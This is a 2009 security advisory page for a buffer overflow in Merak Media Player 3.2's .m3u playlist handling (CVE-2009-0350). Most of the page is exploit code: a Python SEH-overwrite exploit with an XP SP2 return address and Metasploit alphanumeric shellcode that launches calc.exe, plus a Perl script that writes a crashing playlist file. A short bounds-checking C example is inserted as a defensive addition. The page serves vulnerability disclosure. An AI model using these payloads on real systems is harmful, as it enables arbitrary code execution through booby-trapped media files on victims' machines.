Merak Media Player '.m3u' File Remote Buffer Overflow Vulnerability
Written by Houssamix   
Monday, 02 March 2009 22:43


-\\Bugtraq ID:
33419

-\\Class:
Boundary Condition Error

-\\CVE:
CVE-2009-0350


-\\Remote:
Yes

-\\Local:
No

-\\Published:
Jan 25 2009 12:00AM

-\\Updated:
Mar 02 2009 04:06PM

-\\Credit:
Houssamix



-\\Vulnerable:
Qwerks Merak Media Player  3.2



-\\Discussion
Merak Media Player is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Merak Media Player 3.2 is vulnerable; other versions may also be affected.
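
The boundary check described above, as an added example (not code from this advisory or from Merak Media Player, whose source is not on this page): a C routine that validates each .m3u entry against a fixed-size buffer before copying it. `ENTRY_MAX`, `copy_entry` and `m3u_check` are hypothetical names, and the 260-byte limit is an assumption.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical capacity of the entry buffer, NUL included (not from Merak). */
#define ENTRY_MAX 260

enum m3u_status { M3U_OK = 0, M3U_TOO_LONG = 1, M3U_BAD_BYTE = 2 };

/* Copy one playlist line (length n, not NUL-terminated) into dst.
 * Refuses, rather than truncating or overrunning, when it does not fit. */
static enum m3u_status copy_entry(char *dst, size_t dstsz,
                                  const unsigned char *src, size_t n)
{
    if (n >= dstsz)
        return M3U_TOO_LONG;      /* the bounds check the advisory says is missing */
    for (size_t i = 0; i < n; i++)
        if (src[i] < 0x20 && src[i] != '\t')
            return M3U_BAD_BYTE;  /* control bytes do not belong in a path or URL */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return M3U_OK;
}

/* Walk a whole .m3u buffer line by line. Returns M3U_OK when every entry is
 * acceptable, otherwise the first failure with *bad_line set (1-based). */
enum m3u_status m3u_check(const unsigned char *buf, size_t len, size_t *bad_line)
{
    char entry[ENTRY_MAX];
    size_t line = 0, start = 0;

    while (start < len) {
        size_t end = start;
        while (end < len && buf[end] != '\n' && buf[end] != '\r')
            end++;
        line++;
        if (end > start && buf[start] != '#') {   /* skip blank and #EXT lines */
            enum m3u_status st = copy_entry(entry, sizeof entry, buf + start, end - start);
            if (st != M3U_OK) {
                if (bad_line) *bad_line = line;
                return st;
            }
        }
        start = end;                               /* consume CR, LF or CRLF */
        if (start < len && buf[start] == '\r') start++;
        if (start < len && buf[start] == '\n') start++;
    }
    return M3U_OK;
}
```

Bytes at or above 0x80 are accepted so that non-ASCII file names still load; the length check alone rejects a single oversized line such as the one the crash PoC on this page writes.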



-\\Exploit(s)/PoC(s):
The following proof-of-concept and exploit code samples are available:

===============================================================
33419-2.pl
^^^^^^^^^^^
#exploit.py
#
# Merak Media Player 3.2 Buffer Overflow Exploit(SEH)
# By:Encrypt3d.M!nd
#    m1nd3d.wordpress.com
#
# Original Advisory:
# http://www.milw0rm.com/exploits/7857
######################################################
# Nothing Interesting in this exploit, too easy
# just improving my SEH exploitation Skills :p
#

ns = "\xEB\x06\x90\x90"

sh = "\x35\x2F\xD1\x72" # msacm32.drv ..windows xp sp2

chars = "A" * 74

nops = "\x90" * 20


# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com

shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x34\x4e\x33\x4b\x48\x4e\x37"
"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x48\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x33\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x58\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x38\x42\x54\x4e\x30\x4b\x38\x42\x37\x4e\x51\x4d\x4a"
"\x4b\x58\x4a\x46\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x47"
"\x42\x35\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x35\x4a\x46\x4a\x39"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x36"
"\x4e\x46\x43\x56\x50\x42\x45\x36\x4a\x37\x45\x36\x42\x30\x5a")


file=open('geek.m3u','w')
file.write(chars+ns+sh+nops+shellcode)
file.close()



===============================================================
33419.pl
^^^^^^^^^
#!/usr/bin/perl -w

# Author : Houssamix

# Merak Media Player V3.2  m3u file Local Buffer overflow (SEH)
# Download :  http://www.qwerks.com/download/3748/merak.zip

# --------------------------------------------
# EAX 00000000
# ECX 45454545
# EDX 7C9137D8 ntdll.7C9137D8
# EBX 00000000
# ESP 0013F784
# EBP 0013F7A4
# ESI 00000000
# EDI 00000000
# EIP 45454545

# 0013FBE4   42424242  Pointer to next SEH record
# 0013FBE8   45454545  SE handler
# ---------------------------------------------

print "===================================================================== \n";
print "Author : Houssamix                              \n";
print "===================================================================== \n";
print "Merak Media Player V3.2  m3u file Local Buffer overflow (SEH)          \n";
print "===================================================================== \n";

my $buf = "\x42" x 78;
my $seh = "\x45\x45\x45\x45";
my $buff = "\x43" x 1120;
my $file="hsmx.m3u";
$exploit = $buf.$seh.$buff;
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $exploit ;
close($FILE);
print "$file has been created \n";





-\\Solution
Currently we are not aware of any vendor-supplied patches.



-\\Reference(s)
--Merak Media Player
http://www.qwerks.com/product/3748.htm  (Qwerks)
 
